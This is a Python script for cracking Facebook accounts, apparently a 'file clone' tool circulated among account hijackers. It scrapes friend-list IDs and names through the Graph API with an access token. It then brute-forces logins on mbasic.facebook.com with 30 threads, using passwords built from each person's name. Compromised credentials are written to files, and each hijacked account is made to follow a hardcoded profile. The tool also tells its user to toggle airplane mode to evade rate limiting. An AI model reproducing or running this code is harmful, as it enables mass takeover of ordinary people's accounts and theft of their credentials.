#!/usr/bin/python3 import os try: import requests except ImportError: print('\n [✓] installing requests !...\n') os.system('pip install requests') try: import concurrent.futures except ImportError: print('\n [✓] installing futures !...\n') os.system('pip install futures') try: import bs4 except ImportError: print('\n [✓] installing bs4 !...\n') os.system('pip install bs4') import requests, os, re, bs4,platform, sys, json, time, random, datetime, subprocess, threading, itertools,base64,uuid,zlib from concurrent.futures import ThreadPoolExecutor as alaminALAMIN from datetime import datetime from bs4 import BeautifulSoup ct = datetime.now() n = ct.month bulan = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'Agustus', 'September', 'October', 'November', 'December'] try: if n < 0 or n > 12: exit() nTemp = n - 1 except ValueError: exit() current = datetime.now() ta = current.year bu = current.month ha = current.day op = bulan[nTemp] P = '\x1b[1;97m' # M = '\033[1;31m' # H = '\033[1;32m' # K = '\x1b[1;97m' # B = '\x1b[1;97m' # U = '\x1b[1;97m' # O = '\x1b[1;97m' # N = '\x1b[0m' # my_color = [ P, M, H, K, B, U, O, N] warna = random.choice(my_color) data,data2={},{} aman,cp,salah=0,0,0 ubahP,fuck,pwBaru=[],[],[] ok = [] cp = [] id = [] user = [] loop = 0 url_lookup = "https://lookup-id.com/" url_mb = "https://m.facebook.com" url_ip = "https://www.httpbin.org/ip" header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/;]"} bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "Augustus", "09": "September", "10": "October", "11": "November", "12": "December"} done = False def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo =("""\033[1;37m ### ## ### ## ## #### ## ## ## ## ## ## ## ### ### ## ### ## ## ## ## ## ## #### #### ## #### ## ## ## ## ## ## ## ### ## ## ## ## ## ######### ## ######### ## ## ## ## #### ## ## ## ## ## ## ## ## ## ### ## ## ######## ## ## ## ## #### ## ## --------------------------------------------------- AUTHOR : ALAMIN ANCHAR GITHUB : MrALAMIN156 FACEBOOK : ALAMIN ANCHAR TOOL NAME : FILE CLONE TYPE TYPE : FREE VERSION : 1.83.0 ---------------------------------------------------""") def hasil(OK,cp): if not len(OK) != 0: pass if len(cp) != 0: print('\n\n \x1b[1;97m Total OK : \x1b[1;97m %s \x1b[1;97mALAMIN_OK.txt' % (H, P, str(len(ok)))) print(' \x1b[1;97m Total CP :\x1b[1;97m %s \x1b[1;97mALAMIN_CP.txt' % (H, P, str(len(cp)))) input("\x1b[1;97mPress enter to back ALAMIN Menu ") alamin() def alamin(): os.system('clear') print(logo) print print(' [1] Start File Cloning') print(' [2] Create File [Best-Method]') print(' [E] exit ') print('') _alamin___ = input(' [?] Choose option : ') if _alamin___ in ('1', '01'): __xxx__().alaminx(id) if _alamin___ in ('2', '02'): create_file() if _alamin___ in ('E', 'ee'): pass class __xxx__: def __init__(self): self.id = [] def alaminx(self,id): os.system("clear") print(logo) self.cnt = input('Put File Name : ') self.id = open(self.cnt).read().splitlines() os.system('clear') print(logo) print("") ___worldwide___ = ('y') if ___worldwide___ in ('yes','Yes','Y', 'y'): self.__pler__() else: print(' [!] Choose Correct One'); self.alaminx(id) def __metode__(self, user, __chi__, cebok): global ok,cp,loop sys.stdout.write(f"\r \x1b[1;97m[ALAMIN] {loop}|{len(self.id)} [ok][{len(ok)}] [cp][{len(cp)}] ") sys.stdout.flush() try: for pw in __chi__: pw = pw.lower() session=requests.Session() header = { "Host":cebok, "upgrade-insecure-requests":"1", "user-agent":"NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+", "accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "dnt":"1", "x-requested-with":"mark.via.gp", "sec-fetch-site":"same-origin", "sec-fetch-mode":"cors", "sec-fetch-user":"empty", "sec-fetch-dest":"document", "referer":"https://m.facebook.com/", "accept-encoding":"gzip, deflate br", "accept-language":"en-GB,en-US;q=0.9,en;q=0.8" } r = session.get(f"https://{cebok}/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F", headers=header) das = { "lsd":re.search('name="lsd" value="(.*?)"', str(r.text)).group(1), "jazoest":re.search('name="jazoest" value="(.*?)"', str(r.text)).group(1), "uid":user, "flow":"login_no_pin", "pass":pw, "next":"https://developers.facebook.com/tools/debug/accesstoken/" } header1 = { "Host":cebok, "cache-control":"max-age=0", "upgrade-insecure-requests":"1", "origin":"https://"+cebok, "content-type":"application/x-www-form-urlencoded", "user-agent":"Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36", "accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "x-requested-with":"XMLHttpRequest", "sec-fetch-site":"same-origin", "sec-fetch-mode":"cors", "sec-fetch-user":"empty", "sec-fetch-dest":"document", "referer":"https://"+cebok+"/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F", "accept-encoding":"gzip, deflate br", "accept-language":"en-GB,en-US;q=0.9,en;q=0.8" } po = session.post(f"https://{cebok}/login/device-based/validate-password/?shbl=0", data = das, headers = header1, allow_redirects = False) if 'c_user' in session.cookies.get_dict(): coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()]) print(f"\r{H} [ALAMIN-OK] {user} | {pw}") wrt = '%s|%s' % (user,pw) ok.append(wrt) open('ALAMIN_OK.txt' , 'a').write('%s\n' % wrt) self.follow(session,coki) break elif 'checkpoint' in session.cookies.get_dict(): try: tokenz = open('.token.txt').read() cp_ttl = session.get(f'https://graph.facebook.com/{user}?fields=birthday&access_token={tokenz}').json()['birthday'] month, day, year = cp_ttl.split('/') month = bulan_ttl[month] print('\r%s [ALAMIN-CP] %s | %s ' % (M, user, pw)) wrt = '%s|%s' % (user,pw) cp.append(wrt) open('ALAMIN_CP.txt' , 'a').write('%s\n' % wrt) break except (KeyError, IOError): month = '' day = '' year = '' except: pass print('\r%s [ALAMIN-CP] %s | %s ' % (M, user, pw)) wrt = '%s|%s' % (user,pw) cp.append(wrt) open('ALAMIN_CP.txt' , 'a').write('%s\n' % wrt) break else: continue loop+=1 except: self.__metode__(user, pw, cebok) def follow(self, session, coki): r = BeautifulSoup(session.get('https://mbasic.facebook.com/profile.php?id=100007607054845', cookies={'cookie': coki}).text, 'html.parser') get = r.find('a', string='Ikuti').get('href') session.get(('https://mbasic.facebook.com' + str(get)), cookies={'cookie': coki}).text def __pler__(self): print('[1] Crack With Auto Pass ') print('[2] Crack With Name Digit Pass') chi = input('\n [?] Choose: ') if chi == '': print('\nSelect Correct One') self.__pler__() elif chi in ('1', '01'): os.system("clear") print(logo) print("\033[1;31m\rUse flight (airplane) mode before use\033[1;37m") print(47*"-") print('\033[1;37m Total Auto file IDs : %s ' % len(self.id)) print('\033[1;37m Cracking Started...') print(47*"-") with alaminALAMIN(max_workers=30) as ALAMINworld: for zsb in self.id: # Yo Ndak Tau Kok Tanya Saia try: uid, name = zsb.split('|') xz = name.split(' ') first, last = name.split(' ') firstl = first.lower() lastl = last.lower() firsts = first.capitalize() lasts = last.capitalize() if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6: pwx = [firstl+' '+lastl, xz[0]+"12345", xz[0]+"123"] else: pwx = [firstl+' '+lastl, xz[0]+"12345", xz[0]+"123"] pwx = [firstl+' '+lastl, xz[0]+"12345", xz[0]+"123"] ALAMINworld.submit(self.__metode__, uid, pwx, "mbasic.facebook.com") except: pass hasil(ok,cp) elif chi in ('2', '02'): os.system("clear") print(logo) print("\033[1;37m\rEnter Last Name Digits\033[1;37m\n") p1 = input(' Name + 1 : ') p2 = input(' Name + 2 : ') p3 = input(' Name + 3 : ') p4 = input(' Name + 4 : ') os.system("clear") print(logo) print("\033[1;31m\rUse flight (airplane) mode before use\033[1;37m") print(47*"-") print('\033[1;37m Total IDs : %s ' % len(self.id)) print('\033[1;37m Cracking Started...') print(47*"-") with alaminALAMIN(max_workers=30) as ALAMINworld: for zsb in self.id: # Yo Ndak Tau Kok Tanya Saia try: uid, name = zsb.split('|') xz = name.split(' ') if len(xz) == 3 or len(xz) == 4 or len(xz) == 5 or len(xz) == 6: pwx = [name, xz[0]+"123", xz[0]+xz[1], xz[0]+"12345"] else: pwx = [name, xz[0]+"123", xz[0]+xz[1], xz[0]+"12345"] ALAMINworld.submit(self.__metode__, uid, pwx, "mbasic.facebook.com") except: pass hasil(ok,cp) else: print('\n Select Valid One') self.__pler__() def create_file(): os.system('clear') print(logo) print(' [1] Create file manual') print(' [2] Create file auto') print(' [B] Back to main menu') print(50*'-') cf = input(' Choose method: ') if cf =='1': manual() elif cf =='2': auto() elif cf =='3': likes() elif cf =='3' or cf =='b' or cf =='B': main() else: print('\n Choose correct option ...') time.sleep(1) create_file() def manual(): try: token = open('/sdcard/tokenofl.txt', 'r').read() except FileNotFoundError: login() try: r = requests.get('https://graph.facebook.com/me?access_token='+token).text q = json.loads(r) uname = q['name'] except (KeyError): login() os.system('clear') print(logo) print(' Name: '+uname) print(50*'-') limit = int(input(' How many ids do you want to add ? ')) save_file = input(' Save file as: ') t = 0 for u in range(limit): t+=1 try: ids = input(' Put id no%s: '%t) r = requests.get('https://graph.facebook.com/'+ids+'/friends?limit=5000&access_token='+token).text q = json.loads(r) for j in q['data']: uids = j['id'] names = j['name'] first_name = names.split(' ')[0] try: last_name = names.split(' ')[1] except: last_name = 'Khan' with open('/sdcard/'+save_file, 'a') as rd: rd.write(uids+'|'+first_name+'|'+last_name+'\n') except KeyError: print(' No friend for '+ids) pass print(50*'-') print(' Ids saved as: '+save_file) print(50*'-') input(' Press enter to back') alamin() def auto(): os.system('rm -rf temp*') try: access_token = open('/sdcard/tokenofl.txt', 'r').read() except: login() try: r = requests.get('https://graph.facebook.com/me?access_token='+access_token).text q = json.loads(r) uname = q['name'] except: login() os.system('clear') print(logo) print(' Logged user: '+uname) print(50*'-') nusrat = [] try: limit_user = int(input(' How many ids do you want to add ? ')) except: limit_user = 1 count = 0 for fir in range(limit_user): count +=1 udit = input(' Put id%s: '%(count)) try: tfile = open('/sdcard/tokenofl.txt','r').read() fr = requests.get('https://graph.facebook.com/'+udit+'/friends?limit=5000&access_token='+tfile).text qfr = json.loads(fr) temp_save = open('temp.txt', 'a') for data in qfr['data']: uids = data['id'] if uids in nusrat: pass else: nusrat.append(uids) temp_save.write(uids+'\n') temp_save.close() except KeyError: if 'invalid' in str(fr): print(' Logged token has expired ...') pass else: print(' No friends found for user: '+udit) pass os.system('clear') print(logo) print(' Total ids: '+str(len(nusrat))) print(50*'-') try: ask_link = int(input(' How many links do you want to grab? ')) except: ask_link = 1 completed = 0 for links in range(ask_link): completed +=1 li = input(' %s Link start with: '%completed) os.system('cat temp.txt | grep "'+li+'" >> temp2.txt') save_file = input(' Save file as: ') os.system('clear') lines = open('temp2.txt', 'r').readlines() print(logo) print(' Total ids to grab: '+str(len(lines))) print(' Grabbing Process has started') print(50*'-') fileid = 'temp2.txt' fileidopen = open(fileid, 'r').read().splitlines() dill = [] for ids in fileidopen: try: tfile = open('/sdcard/tokenofl.txt','r').read() rg = requests.get('https://graph.facebook.com/'+ids+'/friends?limit=5000&access_token='+tfile).text rgq = json.loads(rg) idsave=open('/sdcard/'+save_file, 'a') for inayat in rgq['data']: uids = inayat['id'] dill.append(uids) nm = inayat['name'] first_name = nm.split(' ')[0] try: last_name = nm.split(' ')[1] except: last_name = 'Khan' idsave.write(uids+'|'+first_name+'|'+last_name+'\n') print(' Grabbed from: '+ids) # print(' Total friends: '+str(len(uids))) print(' Token status: Live') print(50*'-') idsave.close() except Exception as e: #print(e) if 'invalid' in str(rg): print(' Token has expired, try again ...') os.system('rm -rf temp*') pass else: print(' Grabbed from: '+ids) print(' Friendlist ids: 0') print(' Token status: Live') print(50*'-') os.system('rm -rf temp*') pass lenid = open('/sdcard/'+save_file, 'r').readlines() print(' Grabbing Process has completed ') os.system('rm -rf temp*') print(' Total ids grabbed: '+str(len(lenid))) print(' File saved as: /sdcard/'+save_file) print(50*'-') input(' Press enter to back ') alamin() alamin()